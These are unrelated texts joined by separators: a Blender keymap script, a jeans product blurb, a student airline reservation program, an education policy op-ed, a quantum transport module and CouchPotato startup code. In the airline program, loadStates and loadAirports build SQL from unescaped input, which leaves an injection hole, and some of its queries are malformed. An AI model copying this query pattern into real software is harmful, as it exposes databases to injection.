kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_0', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'CAMERA')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_2', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_4', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_persportho', 'NUMPAD_5', 'PRESS')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_6', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_8', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_2', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_4', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_6', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_8', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_4', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_6', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELUPMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELDOWNMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.localview', 'NUMPAD_SLASH', 'PRESS')
kmi = km.keymap_items.new('view3d.ndof_orbit_zoom', 'NDOF_MOTION', 'ANY')
kmi = km.keymap_items.new('view3d.ndof_orbit', 'NDOF_MOTION', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.ndof_pan', 'NDOF_MOTION', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.ndof_all', 'NDOF_MOTION', 'ANY', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'NDOF_BUTTON_FIT', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CCW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', -1.5707963705062866)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', 1.5707963705062866)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BACK', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_LEFT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BOTTOM', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', True)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.view_center_pick', 'MIDDLEMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.translate', 'D', 'CLICK')
kmi = km.keymap_items.new('transform.resize', 'S', 'CLICK')
kmi = km.keymap_items.new('transform.rotate', 'A', 'CLICK')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.viewport_shade')
kmi_props_setattr(kmi.properties, 'value_1', 'SOLID')
kmi_props_setattr(kmi.properties, 'value_2', 'WIREFRAME')
kmi.active = False
kmi = km.keymap_items.new('wm.context_toggle', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.use_occlude_geometry')
# Map Transform Modal Map
km = kc.keymaps.new('Transform Modal Map', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'LEFTMOUSE', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'RET', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'NUMPAD_ENTER', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('TRANSLATE', 'G', 'PRESS')
kmi = km.keymap_items.new_modal('ROTATE', 'R', 'PRESS')
kmi = km.keymap_items.new_modal('RESIZE', 'S', 'CLICK')
kmi = km.keymap_items.new_modal('SNAP_TOGGLE', 'TAB', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'LEFT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'LEFT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'RIGHT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'RIGHT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('ADD_SNAP', 'A', 'PRESS')
kmi = km.keymap_items.new_modal('REMOVE_SNAP', 'A', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new_modal('EDGESLIDE_EDGE_NEXT', 'WHEELDOWNMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('EDGESLIDE_PREV_NEXT', 'WHEELUPMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
# Map Gesture Border
km = kc.keymaps.new('Gesture Border', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('BEGIN', 'LEFTMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE', shift=True)
kmi = km.keymap_items.new_modal('DESELECT', 'LEFTMOUSE', 'RELEASE', ctrl=True)
|
Representing Iron Heart's take on the the classic straight leg 1955 cut, the 1955S utilizes the Japanese brand's classic super heavy, but super soft 21 oz. indigo selvedge denim which is sanforized in order to maintain little or no shrinkage. Other features of the denim include the four button fly, hidden rivets, fully lined rear pockets, and poly/cotton constructional stitching.
|
"""
AIRLINE RESERVATION SYSTEM
DEVELOPERS
Stephen Tafoya
Ryan Hamilton
MAIN PROJECT FILE - RUNS ENTIRE PROGRAM
"""
import sqlite3 # ST Import database management
class AirDB(object): # ST
"""
class DB(db)
documentation:
class that handles main database management,
will handle all database operations
"""
# Initializer
def __init__(self, db): # ST
con = self.connectDB(db) # ST
if con is not None: # ST
self.connection = con # ST
self.cursor = self.connection.cursor() # ST
self.setupDB() # ST
def connectDB(self, db): # ST
"""
connectDB
-- create simplified function with error handling
-- to be used externally
-- returns a connection or None
"""
try:
conn = sqlite3.connect(db) # ST connect to database specified
return conn # ST return connection
except sqlite3.Error as e: # ST catch all sqlite3 errors
print(e) # ST display error
return None # ST return None
def setupDB(self): # ST makes sure the db has correct table
self.cursor.execute('''CREATE TABLE IF NOT EXISTS AIRPORTS (
id integer PRIMARY KEY AUTOINCREMENT,
country text NOT NULL,
state text NOT NULL,
airport text NOT NULL
)''') # ST
def insertAirport(self, query): # ST
"""
adds a new index to airports
should be tuple of format
(country, state, airport)
"""
datastr = '''INSERT INTO AIRPORTS(country,state,airport) VALUES(?,?,?)'''
try:
self.cursor.execute(datastr, query) # ST attempt to querry
except sqlite3.Error as e: # ST catch error
print(e, "failed") # ST display error
def insertAirports(self, table): # ST calls insertAirport with table
for query in table: # ST for each element in table
self.insertAirport(query) # ST insert airport
def loadCountries(self): # RH loads all countries in database
self.cursor.execute('SELECT country FROM AIRPORTS') # RH
all_countries = self.cursor.fetchall() # RH
countries = [] # RH
for i in range(0, len(all_countries)): # RH
temp_var = all_countries[i][0] # RH
countries.append(temp_var) # RH
return countries # RH
def loadStates(self, country): # RH
# Loads all states in database that are in a given country
self.cursor.execute('SELECT state FROM AIRPORTS WHERE country = {x}'. # RH
format(x="'" + country + "'")) # RH
all_states = self.cursor.fetchall() # RH
states = []
for i in range(0, len(all_states)): # RH
temp_var = all_states[i][0] # RH
states.append(temp_var) # RH
return states # RH
def loadAirports(self, state): # RH
# Loads all airports in database that are in a given state
self.cursor.execute('SELECT airport FROM AIRPORTS WHERE state = {x}'. # RH
format(x="'" + state + "'"))
all_airports = self.cursor.fetchall() # RH
airports = [] # RH
for i in range(0, len(all_airports)): # RH
temp_var = all_airports[i][0] # RH
airports.append(temp_var) # RH
return airports # RH
def findAirport(self, airport): # ST
self.cursor.execute("SELECT id FROM AIRPORTS WHERE airport = ?", (airport,))
val = self.cursor.fetchall() # ST
if val[0][0] >= 0: # ST
return val[0][0] # ST
return -1 # ST
def close(self): # ST
self.connection.commit() # ST sync all changes
self.connection.close() # ST close db
class FlightDB(object): # RH
# Initializer
def __init__(self, db): # RH
con = self.connectDB(db) # RH
if con is not None: # RH
self.connection = con # RH
self.cursor = self.connection.cursor() # RH
self.setupDB() # RH
def connectDB(self, db): # RH
"""
connectDB
-- create simplified function with error handling
-- to be used externally
-- returns a connection or None
"""
try:
conn = sqlite3.connect(db) # RH connect to database specified
return conn # RH return connection
except sqlite3.Error as e: # RH catch all sqlite3 errors
print(e) # RH display error
return None # RH return None
def setupDB(self): # RH
self.cursor.execute('''CREATE TABLE IF NOT EXISTS FLIGHTS (
id integer PRIMARY KEY AUTOINCREMENT,
start int NOT NULL,
stop int NOT NULL,
flight_spec text NOT NULL,
address text NOT NULL,
billing_address text,
cost real NOT NULL,
payment_type int NOT NULL,
payment_card text
)''') # ST
self.cursor.execute('''CREATE TABLE IF NOT EXISTS PASSENGERS (
id integer PRIMARY KEY AUTOINCREMENT,
flight_id integer NOT NULL,
name text NOT NULL,
bags integer NOT NULL,
seating text NOT NULL
)''') # ST
def nextIndex(self):
self.cursor.execute("SELECT id FROM FLIGHTS")
var = self.cursor.fetchall()
return len(var)
def insertFlight(self, query): # RH
# adds a new index to the flights table in the database.
data = '''INSERT INTO FLIGHTS(start, stop, flight_spec, address, billing_address, cost, payment_type, payment_card) VALUES(?, ?, ?, ?, ?, ?, ?, ?)'''
try: # RH
self.cursor.execute(data, query) # RH
except sqlite3.Error as e: # RH
print(e, "failed") # RH
def insertFlights(self, table): # RH
for query in table: # RH
self.insertFlight(query) # RH
def insertPassenger(self, query): # RH
# adds a new index to the passangers table in the database
data = '''INSERT INTO PASSENGERS(flight_id, name, bags, seating) VALUES(?, ?, ?, ?)'''
try:
self.cursor.execute(data, query) # RH
except sqlite3.Error as e: # RH
print(e, "failed") # RH
def insertPassangers(self, table): # RH
for query in table: # RH
self.insertPassenger(query) # RH
def loadFlights(self): # RH
# pulls flights table from database and prints it for display
self.cursor.execute('SELECT FLIGHTS') # RH
all_flights = self.cursor.fetchall() # RH
print(all_flights) # RH
def loadPassangers(self): # RH
# pulls passangers table from database and prints it for display
self.cursor.execute('SELECT PASSENGERS') # RH
all_passengers = self.cursor.fetchall() # RH
print(all_passengers) # RH
def close(self): # RH
self.connection.commit() # RH
self.connection.close() # RH
def main():
pass
if __name__ == "__main__":
main()
|
Everybody breathe a sigh of relief. As we bake in the summer heat, at least we know that the federal Elementary and Secondary Education Act won’t be reauthorized until next year. That gives us some time to think before barreling ahead with the newest nostrum for what ails us.
The Obama administration plans to build the reauthorization around four areas. One is a strong curriculum and good tests of student learning; the second is good information about each child, so educators and parents can track and try to correct weaknesses; and the third is intensive intervention to improve student achievement in our lowest-performing schools.
But what if we don’t actually know what makes an effective teacher? Worse, suppose that other levers work better to raise student performance, but we are stuck with the “teacher effectiveness” model for another 10 years (the last reauthorization of the ESEA was the No Child Left Behind Act, which was signed into law in January of 2002 and remains the law of the land today). There is a thicket of competing theories about what makes an effective teacher. And, more troubling, studies show that while effective teachers are certainly important, they explain only a fraction of the difference in student performance.
We have seen these magic potions before. In NCLB, the potion was to assure that every teacher was “highly qualified” to teach the subject matter he or she was assigned to teach. When the magic potion was thought to be limiting class size, Florida and California spent billions of dollars on new classrooms and new teachers.
It is important not to be wrong. If we are wrong, we risk squandering the kids of this decade. One of the saddest stories of the last 40 years is that spending money in itself has a dishearteningly small effect on student achievement. The real increase in per-pupil expenditures over the last 40 years is more than double, and federal support has more than tripled. By contrast, the increase in achievement is mostly measured in low to middle single digits. Money does not seem to produce a general “Kumbaya” effect.
A second consideration is that if we don’t see more significant results, we may not get additional chances. The fact that there are relatively fewer school-age children, a concomitantly smaller voting constituency of parents, and greater financial demands from other social programs will make it harder to fund education substantially. The Congressional Budget Office predicts fewer and fewer dollars available for nondefense discretionary funding, a consequence of increases in entitlement spending. And the new health-care-reform legislation, whatever its virtues, will direct that much more money into non-education spending.
Most critically, despite the hype, we don’t have a high assurance that teacher effectiveness is in fact the most likely path to higher student achievement. And, even if it is, we don’t have a clear understanding of how to make teachers more effective.
Several analyses show that being assigned to different teachers can explain between 7 percent and 15 percent of the difference in student results in a particular year. A couple of outlier analyses show percentage results in the 20s in math. That is a good amount. If it cumulates year after year because students are getting good teachers in all these years, it can make for a huge difference, more than any factor we know of so far that social policy can change.
But assigning students to different teachers does not account for the vast majority of the variation in student performance in any year. And we can’t hope to provide highly effective teachers to all students year after year, so the likely mix won’t achieve uniformly the level of change that excellent teaching might otherwise provide.
One of the saddest stories of the last 40 years is that spending money in itself has a dishearteningly small effect on student achievement.
Moreover, we don’t know what goes into making an effective teacher. Several elements seem to count, but sorting them out will take time. One element is the teacher’s years in service. A second is subject-matter knowledge, the last ESEA reauthorization’s savior. A “new” entrant in the “here’s what does it” sweepstakes is the old ed. school standby, pedagogical technique: Circulate around your classroom, and break down questions not answered correctly into smaller questions. These differing approaches suggest that we don’t yet know the best ways to change teachers so that they can help significantly alter student outcomes.
Meanwhile, emphasizing the individual teacher will slight other factors that may prove more important. For example, promising neuroscientific research is now telling us more about how kids learn. Differently designed curricula or electronically based education may allow for the pacing and explanation that could prove most significant. Or, an understanding of cognitive differences may affect the way a particular student is taught. It may be best to base awards on who picks the best curricula. Or it may be that some factor currently in the mix proves far more influential than expected, such as a student’s health and fitness. The greatest bang for the buck may be in green beans. In the meantime, though, we’ll be stuck with a reauthorized federal education law that centers the action on relating the teacher to the outcome.
So, what should be the objective for the next authorization? How about keeping the effectiveness yardstick but not prejudging what’s considered effective—letting the marketplace of functionality make the choice. This could be somewhat like the criteria used in the federal Investing in Innovation, or i3, competition. There, funds are to go variously to proposals with a “strong base” of evidence that student achievement will be significantly improved, or “good” evidence, or “high potential.” The link to achievement should be direct, not through a way station. We would reap greater rewards when different approaches worked out, and when new developments allowed for new approaches.
Luckily, we know the main measures of student growth. The differences in emphasis—student test scores alone or graduation rates, too, for example—will need to be resolved. This is true whether improvement is seen as the direct measure of school effectiveness or a proxy for teacher effectiveness. When there is so much uncertainty about whether we are right, let’s put our true objective in the forefront, rather than what we currently think may be most closely associated with it.
Of course, teacher effectiveness may very well turn out to be the key to student learning—in which case, states and school systems will gravitate to a teacher-based evaluation system anyway. But if other methods work better, or the best methods change over time, let’s allow our school systems to follow the sun.
Jay P. Urwitz is a member of the board of trustees of Teachers College, Columbia University, and serves on the board of the Woodrow Wilson National Fellowship Foundation. He practices education law as a partner at the law firm of WilmerHale, in Washington.
“Commentary: How Race to the Top Could Inform ESEA Reauthorization,” June 28, 2010.
|
"""Module containing FunctionProperties class."""
class FunctionProperties(object):
"""
Class containing miscellaneous variables for Approach and Approach2vN classes.
Attributes
----------
symq : bool
For symq=False keep all equations in the kernel, and the matrix is of size N by N+1.
For symq=True replace one equation by the normalisation condition,
and the matrix is square N by N.
norm_row : int
If symq=True this row will be replaced by normalisation condition in the kernel matrix.
solmethod : string
String specifying the solution method of the equation L(Phi0)=0.
The possible values are matrix inversion 'solve' and least squares 'lsqr'.
Method 'solve' works only when symq=True.
For matrix free methods (used when mfreeq=True) the possible values are
'krylov', 'broyden', etc.
itype : int
Type of integral for first order approach calculations.
itype=0: the principal parts are evaluated using Fortran integration package QUADPACK \
routine dqawc through SciPy.
itype=1: the principal parts are kept, but approximated by digamma function valid for \
large bandwidth D.
itype=2: the principal parts are neglected.
itype=3: the principal parts are neglected and infinite bandwidth D is assumed.
dqawc_limit : int
For itype=0 dqawc_limit determines the maximum number of sub-intervals
in the partition of the given integration interval.
mfreeq : bool
If mfreeq=True the matrix free solution method is used for first order methods.
phi0_init : array
For mfreeq=True the initial value of zeroth order density matrix elements.
mtype_qd : float or complex
Type for the many-body quantum dot Hamiltonian matrix.
mtype_leads : float or complex
Type for the many-body tunneling matrix Tba.
kpnt_left, kpnt_right : int
Number of points Ek_grid is extended to the left and the right for '2vN' approach.
ht_ker : array
Kernel used when performing Hilbert transform using FFT.
It is generated using specfunc.kernel_fredriksen(n).
emin, emax : float
Minimal and maximal energy in the updated Ek_grid generated by neumann2py.get_grid_ext(sys).
Note that emin<=Dmin and emax>=Dmax.
dmin, dmax : float
Bandedge Dmin and Dmax values of the lead electrons.
ext_fct : float
Multiplication factor used in neumann2py.get_grid_ext(sys), when determining emin and emax.
suppress_err : bool
Determines whether to print the warning when the inversion of the kernel failed.
off_diag_corrections: bool
Determines wether to include first oder off-diagonal corrections to the kernel in the
RTD approach.
"""
def __init__(self,
kerntype='2vN', symq=True, norm_row=0, solmethod=None,
itype=0, dqawc_limit=10000, mfreeq=False, phi0_init=None,
mtype_qd=float, mtype_leads=complex, kpnt=None, dband=None,
off_diag_corrections=True):
self.kerntype = kerntype
self.symq = symq
self.norm_row = norm_row
self.solmethod = solmethod
#
self.itype = itype
self.dqawc_limit = dqawc_limit
#
self.mfreeq = mfreeq
self.phi0_init = phi0_init
#
self.mtype_qd = mtype_qd
self.mtype_leads = mtype_leads
#
self.kpnt = kpnt
self.dband = dband
#
self.kpnt_left = 0
self.kpnt_right = 0
self.ht_ker = None
#
self.dmin, self.dmax = 0, 0
self.emin, self.emax = 0, 0
self.ext_fct = 1.1
#
self.suppress_err = False
self.suppress_wrn = [False]
#
self.off_diag_corrections = off_diag_corrections
def print_error(self, exept):
if not self.suppress_err:
print("WARNING: Could not solve the linear set of equations.\n" +
" Error from the solver: " + str(exept) + "\n"
" The reasons for such a failure can be various:\n" +
" 1. Some of the transport channels may be outside the bandwidth D of the leads.\n" +
" In this case removing some of the states with the method [remove_states()] will help.\n" +
" 2. Replacement of one of the equations with the normalisation condition.\n" +
" In this case try to use different [norm_row]\n"+
" or solve the linear system using [symq=False] and the solution method [solmethod='lsqr'].\n"
" This warning will not be shown again.\n"
" To check if the solution succeeded check the property [success].")
self.suppress_err = True
def print_warning(self, i, message):
if not self.suppress_wrn[i]:
print(message)
self.suppress_wrn[i] = True
|
Going to work for a big company gets a really bad rap I’m startingto learn. Everyone keeps telling me that my brain is going to turnto mush if I stay at AOL too long. The opposite has happened–it’snow month and I have to say I’ve learned a heck of lot.
One of the big lessons I’ve learned is from JonMiller, who’s always talking about extending our brands. It’ssomething we’ve started to take really, really seriously here atWeblogs, Inc. You maybe have noticed that Joystiq has spun off five niche sites, and that Engadget spun out Engadget Mobile.
Today we take another big step in extending our Autoblog franchise with AutoblogGreen.com: a blogdedicated to hybrid cars and technology.
We’ve launched AutoblogGreen in conjunction with AOL’s “Green Week” andEarthday (Green Week ishappening all over AOL: autos, blogging,finance, etc).
|
from logging import handlers
from uuid import uuid4
import locale
import logging
import os.path
import sys
import time
import traceback
import warnings
import re
import tarfile
import shutil
from CodernityDB.database_super_thread_safe import SuperThreadSafeDatabase
from argparse import ArgumentParser
from cache import FileSystemCache
from couchpotato import KeyHandler, LoginHandler, LogoutHandler
from couchpotato.api import NonBlockHandler, ApiHandler
from couchpotato.core.event import fireEventAsync, fireEvent
from couchpotato.core.helpers.encoding import sp
from couchpotato.core.helpers.variable import getDataDir, tryInt, getFreeSpace
import requests
from requests.packages.urllib3 import disable_warnings
from tornado.httpserver import HTTPServer
from tornado.web import Application, StaticFileHandler, RedirectHandler
def getOptions(args):
# Options
parser = ArgumentParser(prog = 'CouchPotato.py')
parser.add_argument('--data_dir',
dest = 'data_dir', help = 'Absolute or ~/ path of the data dir')
parser.add_argument('--config_file',
dest = 'config_file', help = 'Absolute or ~/ path of the settings file (default DATA_DIR/settings.conf)')
parser.add_argument('--debug', action = 'store_true',
dest = 'debug', help = 'Debug mode')
parser.add_argument('--console_log', action = 'store_true',
dest = 'console_log', help = "Log to console")
parser.add_argument('--quiet', action = 'store_true',
dest = 'quiet', help = 'No console logging')
parser.add_argument('--daemon', action = 'store_true',
dest = 'daemon', help = 'Daemonize the app')
parser.add_argument('--pid_file',
dest = 'pid_file', help = 'Path to pidfile needed for daemon')
options = parser.parse_args(args)
data_dir = os.path.expanduser(options.data_dir if options.data_dir else getDataDir())
if not options.config_file:
options.config_file = os.path.join(data_dir, 'settings.conf')
if not options.pid_file:
options.pid_file = os.path.join(data_dir, 'couchpotato.pid')
